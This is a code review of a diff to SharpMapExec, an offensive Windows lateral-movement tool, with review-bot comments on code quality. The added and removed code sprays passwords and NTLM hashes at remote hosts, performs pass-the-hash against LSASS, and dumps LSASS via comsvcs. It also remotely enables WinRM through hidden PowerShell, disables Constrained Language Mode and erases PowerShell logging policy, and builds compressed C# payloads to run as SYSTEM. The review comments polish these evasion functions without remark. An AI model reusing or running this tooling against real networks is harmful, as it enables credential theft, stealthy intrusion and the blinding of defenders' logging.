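Review bot: `CreateSecuredString` allocates the `SecureString` before the empty-input test, so the `return null` path leaves an undisposed instance behind, and the returned object is never made read-only. Moving `if (string.IsNullOrEmpty(pw)) return null;` to the top of the method and adding `secureString.MakeReadOnly();` before the final return fixes both. The method also needs a doc comment stating that the source `pw` stays in memory as an ordinary managed string, so the conversion satisfies APIs that demand a `SecureString` but does not protect the password. The same comment should say that callers get `null` for empty input and are responsible for disposing the result.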
  • ■ ■ ■ ■ ■ ■
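--- a/SharpMapExec/Helpers/PsFunction.cs
+++ b/SharpMapExec/Helpers/PsFunction.cs
@@ -78,36 +78,38 @@
 
  public static string RunAsSystem(string command)
  {
- //string csFile = Lib.Wsman.Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\System.cs"));
- string csFile = "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";
+ //string csFile = Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\System.cs"));
+ string csFile = "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";
  string function = @"
 $b64 = '{0}'
 $output = New-Object System.IO.MemoryStream
 $Stream = New-Object IO.Compression.GZipStream([IO.MemoryStream][Convert]::FromBase64String($b64),[IO.Compression.CompressionMode]::Decompress)
 $Stream.CopyTo($output)
 $data = [System.Text.Encoding]::utf8.GetString($output.ToArray())
+
+$data = $data.Replace('REPLACEME', '{1}')
 add-type -Language CSharp $data
-
-[ConsoleApp2.Program]::System('{1}')
+[ConsoleApp2.Program]::System()
 ";
- return String.Format(function, csFile, Convert.ToBase64String(Encoding.Unicode.GetBytes(command)));
+ return String.Format(function, csFile, CompressData(command));
  }
 
  public static string RunDelegationWalk(string command)
  {
- //string csFile = Lib.Wsman.Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\DelegWalk.cs"));
- string csFile = "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";
+ //string csFile = Compress(File.ReadAllBytes(@"C:\git\ConsoleApp1\DelegWalk.cs"));
+ string csFile = "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";
  string function = @"
 $b64 = '{0}'
 $output = New-Object System.IO.MemoryStream
 $Stream = New-Object IO.Compression.GZipStream([IO.MemoryStream][Convert]::FromBase64String($b64),[IO.Compression.CompressionMode]::Decompress)
 $Stream.CopyTo($output)
 $data = [System.Text.Encoding]::utf8.GetString($output.ToArray())
+
+$data = $data.Replace('REPLACEME', '{1}')
 add-type -Language CSharp $data
-
-[ConsoleApp1.Program]::DelegWalk('{1}')
+[ConsoleApp1.Program]::DelegWalk()
 ";
- return String.Format(function, csFile, Convert.ToBase64String(Encoding.Unicode.GetBytes(command)));
+ return String.Format(function, csFile, CompressData(command));
  }
 
  public static string FindSystemCred()
@@ -233,7 +235,7 @@
  {{
  a.EntryPoint.Invoke(null, new object[]
  {{
- args.Skip(1).ToArray<string>()
+ args.ToArray<string>()
  }});
  }}
  catch
@@ -261,15 +263,13 @@
 }}
 '@
 Add-Type -Language CSharp -TypeDefinition $code
-[array]$arg = @'
-null {1}
-'@.split()
+[array]$arg = '{1}'.split()
 ", file, arguments);
  return String.Format(@"
 {0}
 iEx $data
 $([Loader.Program]::LoadAssembly($arg) | out-string)
-", DecompressData(Misc.CompressData(template)));
+", DecompressData(CompressData(template)));
  }
  }
 }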
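Review bot: In the last hunk `[array]$arg = '{1}'.split()` places `arguments` inside a single-quoted PowerShell literal with no escaping, so a `'` in the value ends the literal and the remainder is parsed as script; the here-string it replaces tolerated single quotes. Doubling the quote before formatting, `arguments.Replace("'", "''")`, keeps the value as data. The `'{1}'` that `$data.Replace('REPLACEME', '{1}')` inserts in RunAsSystem and RunDelegationWalk is safe only if `CompressData` emits quote-free text such as Base64, which is not visible in this diff and should be stated in a comment. The method containing the last hunk begins in the skipped lines.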
  • ■ ■ ■ ■ ■
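--- a/SharpMapExec/Helpers/SecurityContext.cs
+++ b/SharpMapExec/Helpers/SecurityContext.cs
@@ -138,6 +138,7 @@
  hProcess = Natives.OpenProcess(Natives.ProcessAccessFlags.All, false, plsass.Id);
  Keys keys = new Keys(hProcess, lsasrv, osHelper);
  Pth.CreateProcess(hProcess, lsasrv, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), user, domain, ntlmHash, aes128, aes256, rc4, binary, arguments, luid, true);
+ //Ptp.CreateProcess(hProcess, lsasrv, kerberos, osHelper, keys.GetIV(), keys.GetAESKey(), keys.GetDESKey(), user, domain, ntlmHash, aes128, aes256, rc4, binary, arguments, luid, false);
  }
 
  public static string AskTicket(string user, string domain, string hash, KERB_ETYPE encType, string dc)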
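Review bot: The only line this section adds is a commented-out `Ptp.CreateProcess(...)` call; dead code like this should be deleted, or replaced by a short comment saying why the alternative is kept and when it would be enabled. The enclosing method starts in the skipped lines, so whether the `hProcess` handle returned by `Natives.OpenProcess` is closed afterwards cannot be checked from this hunk.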
  • ■ ■ ■ ■ ■ ■
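--- a/SharpMapExec/Lib/Cim.cs
+++ b/SharpMapExec/Lib/Cim.cs
@@ -0,0 +1,243 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Management;
+using System.Text;
+using System.Threading;
+using System.Threading.Tasks;
+using Microsoft.Management.Infrastructure;
+using Microsoft.Management.Infrastructure.Options;
+using SharpMapExec.Helpers;
+
+namespace SharpMapExec.Lib
+{
+ class Cim
+ {
+ public static string Namespace = @"root\cimv2";
+
+ public static CimSession newSession(string computername, string domain, string username, string password, bool impersonate = false)
+ {
+ CimSession cimSession;
+
+ if (impersonate)
+ {
+ DComSessionOptions options = new DComSessionOptions { Impersonation = ImpersonationType.Default };
+ cimSession = CimSession.Create(computername, options);
+ }
+ else
+ {
+ CimCredential credentials = new CimCredential(PasswordAuthenticationMechanism.Negotiate, domain, username, Misc.CreateSecuredString(password));
+ WSManSessionOptions sessionOptions = new WSManSessionOptions();
+ sessionOptions.AddDestinationCredentials(credentials);
+ sessionOptions.MaxEnvelopeSize = 256000;
+ cimSession = CimSession.Create(computername, sessionOptions);
+ }
+ return cimSession;
+ }
+
+ public static bool CheckLocalAdmin(CimSession cimSession)
+ {
+ if (!cimSession.TestConnection(out CimInstance instance, out CimException exception))
+ {
+ Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", cimSession.ComputerName));
+ return false;
+ }
+ Console.WriteLine(String.Format(" [+] Local Admin on {0}", cimSession.ComputerName));
+ return true;
+ }
+
+ public static void enable_winrm(CimSession cimSession)
+ {
+ CimMethodParametersCollection cimParams = new CimMethodParametersCollection
+ {
+ CimMethodParameter.Create("CommandLine", "powershell -nop -w hidden -command 'Enable-PSRemoting -Force'", CimFlags.In)
+ };
+ CimMethodResult results = cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams);
+ if (results.ReturnValue.Value.ToString() == "0")
+ {
+ Console.WriteLine(" [+] WinRm Enabled");
+ }
+ else
+ {
+ Console.WriteLine(" [-] Failed To Enable WinRm");
+ }
+ }
+
+ public static void disable_winrm(CimSession cimSession)
+ {
+ CimMethodParametersCollection cimParams = new CimMethodParametersCollection
+ {
+ CimMethodParameter.Create("CommandLine", "powershell -nop -w hidden -command 'Disable-PSRemoting -Force'", CimFlags.In)
+ };
+ CimMethodResult results = cimSession.InvokeMethod(new CimInstance("Win32_Process", Namespace), "Create", cimParams);
+ if (results.ReturnValue.Value.ToString() == "0")
+ {
+ Console.WriteLine(" [+] WinRm Disabled");
+ }
+ else
+ {
+ Console.WriteLine(" [-] Failed To Disable WinRm");
+ }
+ }
+
+ //registry
+ //https://wutils.com/wmi/root/cimv2/stdregprov/
+ public static bool regExists(CimSession cimSession, UInt32 hDefKey, string sSubKeyName, string keyName)
+ {
+ CimMethodParametersCollection cimParams = new CimMethodParametersCollection
+ {
+ CimMethodParameter.Create("hDefKey", hDefKey, CimFlags.In),
+ CimMethodParameter.Create("sSubKeyName", sSubKeyName, CimFlags.In)
+ };
+ CimMethodResult results = cimSession.InvokeMethod(new CimInstance("StdRegProv", Namespace), "EnumValues", cimParams);
+ if (results.ReturnValue.Value.ToString() != "0")
+ return false;
+
+ string value = ((string[])results.OutParameters["sNames"].Value).FirstOrDefault(i => i.Contains(keyName));
+ if (string.IsNullOrEmpty(value))
+ {
+ return false;
+ }
+ return true;
+ }
+
+ public static CimMethodResult readRegValue(CimSession cimSession, UInt32 hDefKey, string sSubKeyName, string keyName, string method)
+ {
+ CimMethodParametersCollection cimParams = new CimMethodParametersCollection
+ {
+ CimMethodParameter.Create("hDefKey", hDefKey, CimFlags.In),
+ CimMethodParameter.Create("sSubKeyName", sSubKeyName, CimFlags.In),
+ CimMethodParameter.Create("sValueName", keyName, CimFlags.In)
+ };
+ CimMethodResult results = cimSession.InvokeMethod(new CimInstance("StdRegProv", Namespace), method, cimParams);
+ return results;
+ }
+
+ public static string setRegValue(CimSession cimSession, UInt32 hDefKey, string sSubKeyName, string keyName, string keyValue)
+ {
+ CimMethodParametersCollection cimParams = new CimMethodParametersCollection
+ {
+ CimMethodParameter.Create("hDefKey", hDefKey, CimFlags.In),
+ CimMethodParameter.Create("sSubKeyName", sSubKeyName, CimFlags.In),
+ CimMethodParameter.Create("sValueName", keyName, CimFlags.In),
+ CimMethodParameter.Create("sValue", keyValue, CimFlags.In)
+ };
+ CimMethodResult result = cimSession.InvokeMethod(new CimInstance("StdRegProv", Namespace), "SetStringValue", cimParams);
+ return result.ReturnValue.Value.ToString();
+ }
+
+ public static string setRegValue(CimSession cimSession, UInt32 hDefKey, string sSubKeyName, string keyName, UInt32 keyValue)
+ {
+ CimMethodParametersCollection cimParams = new CimMethodParametersCollection
+ {
+ CimMethodParameter.Create("hDefKey", hDefKey, CimFlags.In),
+ CimMethodParameter.Create("sSubKeyName", sSubKeyName, CimFlags.In),
+ CimMethodParameter.Create("sValueName", keyName, CimFlags.In),
+ CimMethodParameter.Create("uValue", keyValue, CimFlags.In)
+ };
+ CimMethodResult result = cimSession.InvokeMethod(new CimInstance("StdRegProv", Namespace), "SetDWORDValue", cimParams);
+ return result.ReturnValue.Value.ToString();
+ }
+
+ public static void disable_pslockdown(CimSession cimSession)
+ {
+ bool lockdown = regExists(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy");
+ if (!lockdown)
+ {
+ Console.WriteLine("[*] CLM not enabled");
+ return;
+ }
+
+ string value = (string)readRegValue(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy", "GetStringValue").OutParameters["sValue"].Value;
+ Console.WriteLine(" [*] __PSLockdownPolicy value: {0}", value);
+
+ if (value.ToString() == "8")
+ {
+ return;
+ }
+
+ string result = setRegValue(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy", "8");
+ if (result.Contains("0"))
+ {
+ Console.WriteLine(" [+] Constrained Language Mode Disabled");
+ }
+ else
+ {
+ Console.WriteLine(" [-] Failed To Disable Constrained Language Mode");
+ }
+ }
+
+ public static void check_pslockdown(CimSession cimSession)
+ {
+ bool lockdown = regExists(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy");
+ if (!lockdown)
+ {
+ Console.WriteLine("[*] CLM not enabled");
+ return;
+ }
+
+ string value = (string)readRegValue(cimSession, 0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy", "GetStringValue").OutParameters["sValue"].Value;
+ Console.WriteLine(" [*] __PSLockdownPolicy value: {0}", value);
+ }
+
+ public static void disable_pslogging(CimSession cimSession)
+ {
+ Dictionary<string, string> keys = new Dictionary<string, string>
+ {
+ { "EnableModuleLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" },
+ { "EnableTranscripting", @"Software\Policies\Microsoft\Windows\PowerShell\Transcription" },
+ { "EnableScriptBlockLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
+ { "EnableScriptBlockInvocationLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
+ };
+ foreach (var key in keys)
+ {
+ bool lockdown = regExists(cimSession, 0x80000002, key.Value, key.Key);
+ if (!lockdown)
+ {
+ Console.WriteLine("[*] {0} not enabled", key.Key);
+ continue;
+ }
+
+ var value = readRegValue(cimSession, 0x80000002, key.Value, key.Key, "GetDWORDValue").OutParameters["uValue"].Value;
+ Console.WriteLine(" [*] {0} value: {1}", key.Key, value);
+
+ if(value.ToString() == "0")
+ {
+ continue;
+ }
+
+ string result = setRegValue(cimSession, 0x80000002, key.Value, key.Key, 0);
+ if (result.Contains("0"))
+ {
+ Console.WriteLine(" [+] {0} Disabled", key.Key);
+ }
+ else
+ {
+ Console.WriteLine(" [-] Failed To Disable {0}", key.Key);
+ }
+ }
+ }
+
+ public static void check_pslogging(CimSession cimSession)
+ {
+ Dictionary<string, string> keys = new Dictionary<string, string>
+ {
+ { "EnableModuleLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" },
+ { "EnableTranscripting", @"Software\Policies\Microsoft\Windows\PowerShell\Transcription" },
+ { "EnableScriptBlockLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
+ { "EnableScriptBlockInvocationLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
+ };
+ foreach (var key in keys)
+ {
+ if (!regExists(cimSession, 0x80000002, key.Value, key.Key))
+ {
+ Console.WriteLine("[*] {0} not enabled", key.Key);
+ continue;
+ }
+ var value = readRegValue(cimSession, 0x80000002, key.Value, key.Key, "GetDWORDValue").OutParameters["uValue"].Value;
+ Console.WriteLine(" [*] {0} value: {1}", key.Key, value);
+ }
+ }
+ }
+}
+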
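Review bot: `disable_pslockdown` and `disable_pslogging` test success with `result.Contains("0")`, which is also true for any non-zero return code that contains a zero digit, so a failed registry write can be reported as done; compare exactly, as `enable_winrm` already does: `if (result == "0")`. Both methods overwrite policy values on the remote host and keep no record beyond one console line, so the previous state cannot be reliably restored after an assessment; the original value and key path should be recorded for rollback. `regExists` matches with `i.Contains(keyName)`, a substring test that also accepts longer value names, and it casts `sNames` without a null check, which presumably fails for a key that has no values. `CheckLocalAdmin` prints "Local Admin" after `TestConnection` alone and discards the `CimException`, so the message claims more than was verified.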
  • ■ ■ ■ ■ ■ ■
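--- a/SharpMapExec/Lib/Kerberos.cs
+++ b/SharpMapExec/Lib/Kerberos.cs
@@ -0,0 +1,85 @@
+using Rubeus;
+using SharpMapExec.Helpers;
+using System;
+using System.Collections.Generic;
+using System.Threading.Tasks;
+using static Rubeus.Interop;
+
+namespace SharpMapExec.Lib
+{
+ public class kerberos
+ {
+ public static void Kerberos(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags, string protocol)
+ {
+ StartJob(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags, protocol);
+ //var listOfTasks = new List<Task>();
+ //listOfTasks.Add(new Task(() => StartJob(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags, protocol)));
+ //Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
+ }
+
+ public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags, string protocol)
+ {
+ AToken.MakeToken("Fake", "Fake", "Fake");
+ Console.WriteLine("------------------");
+ string ticketoutput;
+
+ if (String.IsNullOrEmpty(ticket))
+ {
+ foreach (string user in users)
+ {
+ var secrets = hashes.Length > 0 ? hashes : passwords;
+ foreach (string secret in secrets)
+ {
+ string hash;
+ if (passwords.Length > 0)
+ {
+ string salt = String.Format("{0}{1}", domain.ToUpper(), user);
+ hash = Crypto.KerberosPasswordHash(encType, secret, salt);
+ }
+ else
+ {
+ hash = secret;
+ }
+ Console.WriteLine(string.Format("[*] User: {0}", user));
+ Console.WriteLine(string.Format("[*] Domain: {0}", domain));
+ Console.WriteLine(string.Format("[*] Secret: {0}", secret));
+ ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
+ if (ticketoutput.Contains("[+] Ticket successfully imported!"))
+ Console.WriteLine("[+] Ticket successfully imported!");
+ else
+ {
+ Console.WriteLine("[-] Could not request TGT");
+ continue;
+ }
+ if (protocol.ToLower() == "smb")
+ Scan.SMB(computernames, module);
+ else if (protocol.ToLower() == "winrm")
+ Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
+ else if (protocol.ToLower() == "reg32")
+ Scan.REG32(computernames, module);
+ }
+ }
+ }
+ else
+ {
+ Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
+ ticketoutput = SecurityContext.ImportTicket(ticket);
+ if (ticketoutput.Contains("[+] Ticket successfully imported!"))
+ Console.WriteLine("[+] TGT imported successfully!");
+ else
+ {
+ Console.WriteLine("[-] Could not import TGT");
+ return;
+ }
+ if (protocol.ToLower() == "smb")
+ Scan.SMB(computernames, module);
+ else if (protocol.ToLower() == "winrm")
+ Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
+ else if (protocol.ToLower() == "reg32")
+ Scan.REG32(computernames, module);
+ }
+
+ AToken.RevertFromToken();
+ }
+ }
+}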
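Review bot: `StartJob` calls `AToken.MakeToken` at the top but reaches `AToken.RevertFromToken()` only on the normal exit path; the early `return` after "[-] Could not import TGT" and any exception thrown from a `Scan.*` call skip the revert and leave the thread on the substituted token. Wrapping the body as `try { ... } finally { AToken.RevertFromToken(); }` covers every exit. `Console.WriteLine(string.Format("[*] Secret: {0}", secret));` writes the password or hash in clear to the console, where it ends up in scrollback and any redirected log; mask it or print only its kind. The `protocol.ToLower() == "..."` comparisons are culture-sensitive; `string.Equals(protocol, "smb", StringComparison.OrdinalIgnoreCase)` is the stable form.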
  • ■ ■ ■ ■ ■ ■
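--- a/SharpMapExec/Lib/KerberosSmb.cs
+++ b/SharpMapExec/Lib/KerberosSmb.cs
@@ -1,108 +0,0 @@
-using Rubeus;
-using SharpMapExec.Helpers;
-using System;
-using System.Collections.Generic;
-using System.IO;
-using static Rubeus.Interop;
-
-namespace SharpMapExec.Lib
-{
- public class kerberossmb
- {
- public static void KerberosSmb(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List<string> flags)
- {
- StartJob(users, domain, passwords, hashes, ticket, encType, dc, computernames, module, moduleargument, flags);
- //var listOfTasks = new List<Task>();
- //listOfTasks.Add(new Task(() => StartJob(user, domain, hash, encType, outfile, ptt, dc, luid, describe, computernames, module, moduleargument)));
- //Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
- }
-
- public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, List<string> flags)
- {
- string ticketoutput;
- if (String.IsNullOrEmpty(ticket))
- {
- foreach (string user in users)
- {
- var secrets = hashes.Length > 0 ? hashes : passwords;
- foreach (string secret in secrets)
- {
- string hash;
- if (passwords.Length > 0)
- {
- string salt = String.Format("{0}{1}", domain.ToUpper(), user);
- hash = Crypto.KerberosPasswordHash(encType, secret, salt);
- }
- else
- {
- hash = secret;
- }
- AToken.MakeToken("Fake", "Fake", "Fake");
- Console.WriteLine("------------------");
- Console.WriteLine(string.Format("[*] User: {0}", user));
- Console.WriteLine(string.Format("[*] domain: {0}", domain));
- Console.WriteLine(string.Format("[*] secret: {0}", secret));
- ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
- if (ticketoutput.Contains("[+] Ticket successfully imported!"))
- Console.WriteLine("[+] Ticket successfully imported!");
- else
- {
- Console.WriteLine("[-] Could not request TGT");
- continue;
- }
- Console.WriteLine();
- foreach (string computername in computernames)
- {
- Console.WriteLine(String.Format("[*] Checking {0}", computername));
- if (!Misc.CheckHostPort(computername, 445))
- {
- Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
- Console.WriteLine();
- continue;
- }
- if (!Directory.Exists(Path.Combine("loot", computername)))
- {
- Directory.CreateDirectory(Path.Combine("loot", computername));
- }
- Smb.CheckLocalAdmin(computername, module);
- Console.WriteLine("");
- }
- AToken.RevertFromToken();
- }
- }
- }
- else
- {
- AToken.MakeToken("Fake", "Fake", "Fake");
- Console.WriteLine("------------------");
- Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
- ticketoutput = SecurityContext.ImportTicket(ticket);
- if (ticketoutput.Contains("[+] Ticket successfully imported!"))
- Console.WriteLine("[+] TGT imported successfully!");
- else
- {
- Console.WriteLine("[-] Could not import TGT");
- return;
- }
- Console.WriteLine();
- foreach (string computername in computernames)
- {
- Console.WriteLine(String.Format("[*] Checking {0}", computername));
- if (!Misc.CheckHostPort(computername, 445))
- {
- Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
- Console.WriteLine();
- continue;
- }
- if (!Directory.Exists(Path.Combine("loot", computername)))
- {
- Directory.CreateDirectory(Path.Combine("loot", computername));
- }
- Smb.CheckLocalAdmin(computername, module);
- Console.WriteLine("");
- }
- AToken.RevertFromToken();
- }
- }
- }
-}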
  • ■ ■ ■ ■ ■ ■
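--- a/SharpMapExec/Lib/KerberosWinrm.cs
+++ b/SharpMapExec/Lib/KerberosWinrm.cs
@@ -1,179 +0,0 @@
-using Rubeus;
-using SharpMapExec.Helpers;
-using System;
-using System.Collections.Generic;
-using System.IO;
-using static Rubeus.Interop;
-
-namespace SharpMapExec.Lib
-{
- public class kerberoswinrm
- {
- public static void KerberosWinRm(string[] users, string domain, string[] passwords, string[] hash, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
- {
- if (module.Contains("exec") && moduleargument.Length == 0)
- {
- Console.WriteLine("[-] Missing exec argument");
- return;
- }
- if (module.Contains("assembly") && !File.Exists(path))
- {
- Console.WriteLine("[-] Missing assembly path");
- return;
- }
- if (module.Contains("download") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
- {
- Console.WriteLine("[-] Need path and destination");
- return;
- }
- if (module.Contains("upload") && (String.IsNullOrEmpty(path) || String.IsNullOrEmpty(destination)))
- {
- Console.WriteLine("[-] Need path and destination");
- return;
- }
- StartJob(users, domain, passwords, hash, ticket, encType, dc, computernames, module, moduleargument, path, destination, flags);
- //var listOfTasks = new List<Task>();
- //listOfTasks.Add(new Task(() => StartJob(users, domain, passwords, hash, ticket, encType, dc, computernames, module, moduleargument, flags)));
- //Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
- }
-
- public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
- {
- AToken.MakeToken("Fake", "Fake", "Fake");
- string ticketoutput;
- if (String.IsNullOrEmpty(ticket))
- {
- foreach (string user in users)
- {
- var secrets = hashes.Length > 0 ? hashes : passwords;
- foreach (string secret in secrets)
- {
- string hash;
- if (passwords.Length > 0)
- {
- string salt = String.Format("{0}{1}", domain.ToUpper(), user);
- hash = Crypto.KerberosPasswordHash(encType, secret, salt);
- }
- else
- {
- hash = secret;
- }
-
- Console.WriteLine("------------------");
- Console.WriteLine(string.Format("[*] User: {0}", user));
- Console.WriteLine(string.Format("[*] domain: {0}", domain));
- Console.WriteLine(string.Format("[*] secret: {0}", secret));
- ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
- if (ticketoutput.Contains("[+] Ticket successfully imported!"))
- Console.WriteLine("[+] Ticket successfully imported!");
- else
- {
- Console.WriteLine("[-] Could not request TGT");
- continue;
- }
- //ticket debugging
- //List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
- //LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
- Console.WriteLine();
- foreach (string computername in computernames)
- {
- Console.WriteLine(String.Format("[*] Checking {0}", computername));
- if (!Misc.CheckHostPort(computername, 5985))
- {
- Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
- Console.WriteLine();
- continue;
- }
- if (!Directory.Exists(Path.Combine("loot", computername)))
- {
- Directory.CreateDirectory(Path.Combine("loot", computername));
- }
- if (module.Length == 0 || module.Contains("exec"))
- {
- Wsman.CheckLocalAdmin(computername, moduleargument, flags);
- }
- else if (module.Contains("comsvcs"))
- {
- Wsman.InvokeComSvcsLsassDump(computername);
- }
- else if (module.Contains("secrets") || module.Contains("secret"))
- {
- Wsman.GetSecrets(computername);
- }
- else if (module.Contains("assembly"))
- {
- Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
- }
- else if (module.Contains("download"))
- {
- Wsman.CopyFile(computername, path, destination);
- }
- else if (module.Contains("upload"))
- {
- Wsman.UploadFile(computername, path, destination);
- }
- Console.WriteLine("");
- }
- }
- }
- }
- else
- {
- Console.WriteLine("------------------");
- Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
- ticketoutput = SecurityContext.ImportTicket(ticket);
- if (ticketoutput.Contains("[+] Ticket successfully imported!"))
- Console.WriteLine("[+] TGT imported successfully!");
- else
- {
- Console.WriteLine("[-] Could not import TGT");
- return;
- }
- //ticket debugging
- //List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
- //LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
- Console.WriteLine();
- foreach (string computername in computernames)
- {
- Console.WriteLine(String.Format("[*] Checking {0}", computername));
- if (!Misc.CheckHostPort(computername, 5985))
- {
- Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername, flags));
- Console.WriteLine();
- continue;
- }
- if (!Directory.Exists(Path.Combine("loot", computername)))
- {
- Directory.CreateDirectory(Path.Combine("loot", computername));
- }
- if (module.Length == 0 || module.Contains("exec"))
- {
- Wsman.CheckLocalAdmin(computername, moduleargument, flags);
- }
- else if (module.Contains("comsvcs"))
- {
- Wsman.InvokeComSvcsLsassDump(computername);
- }
- else if (module.Contains("secrets") || module.Contains("secret"))
- {
- Wsman.GetSecrets(computername);
- }
- else if (module.Contains("assembly"))
- {
- Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
- }
- else if (module.Contains("download"))
- {
- Wsman.CopyFile(computername, path, destination);
- }
- else if (module.Contains("upload"))
- {
- Wsman.UploadFile(computername, path, destination);
- }
- Console.WriteLine("");
- }
- }
- AToken.RevertFromToken();
- }
- }
-}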
  • ■ ■ ■ ■ ■ ■
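--- a/SharpMapExec/Lib/Ntlm.cs
+++ b/SharpMapExec/Lib/Ntlm.cs
@@ -0,0 +1,93 @@
+using Microsoft.Management.Infrastructure;
+using SharpMapExec.Helpers;
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Threading.Tasks;
+using static SharpMapExec.Helpers.SecurityContext;
+
+namespace SharpMapExec.Lib
+{
+ public class ntlm
+ {
+ public static void Ntlm<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument,string path, string destination, List<string> flags, string protocol)
+ {
+ StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags, protocol);
+ //var listOfTasks = new List<Task>();
+ //listOfTasks.Add(new Task(() => StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags, protocol)));
+ //Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
+ }
+
+ public static void StartJob<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags, string protocol)
+ {
+ string[] passwords;
+ if (typeof(T) == typeof(NTHash))
+ {
+ passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
+ foreach (string user in users)
+ {
+ foreach (string password in passwords)
+ {
+ Console.WriteLine("------------------");
+ Console.WriteLine(string.Format("[*] User: {0}", user));
+ Console.WriteLine(string.Format("[*] domain: {0}", domain));
+ Console.WriteLine(string.Format("[*] secret: {0}", password));
+ Console.WriteLine();
+ SetThreadToken(user, domain, password);
+ if (protocol.ToLower() == "smb")
+ {
+ Scan.SMB(computernames, module);
+ }
+ else if (protocol.ToLower() == "winrm")
+ {
+ Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
+ }
+ else if (protocol.ToLower() == "reg32")
+ {
+ Scan.REG32(computernames, module);
+ }
+ }
+ }
+ }
+ else if (typeof(T) == typeof(ClearText))
+ {
+ passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
+ foreach (string user in users)
+ {
+ foreach (string password in passwords)
+ {
+ Console.WriteLine("------------------");
+ Console.WriteLine(string.Format("[*] User: {0}", user));
+ Console.WriteLine(string.Format("[*] domain: {0}", domain));
+ Console.WriteLine(string.Format("[*] secret: {0}", password));
+ Console.WriteLine();
+ using (new Impersonator.Impersonation(domain, user, password))
+ {
+ if (protocol.ToLower() == "smb")
+ {
+ Scan.SMB(computernames, module);
+ }
+ else if (protocol.ToLower() == "winrm")
+ {
+ Scan.WINRM(computernames, module, moduleargument, path, destination, flags);
+ }
+ else if (protocol.ToLower() == "cim")
+ {
+ foreach (string computername in computernames)
+ {
+ CimSession cimSession;
+ cimSession = Cim.newSession(computername, domain, user, password, flags.Contains("impersonate"));
+ Scan.CIM(cimSession, module);
+ }
+ }
+ else if (protocol.ToLower() == "reg32")
+ {
+ Scan.REG32(computernames, module);
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+}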
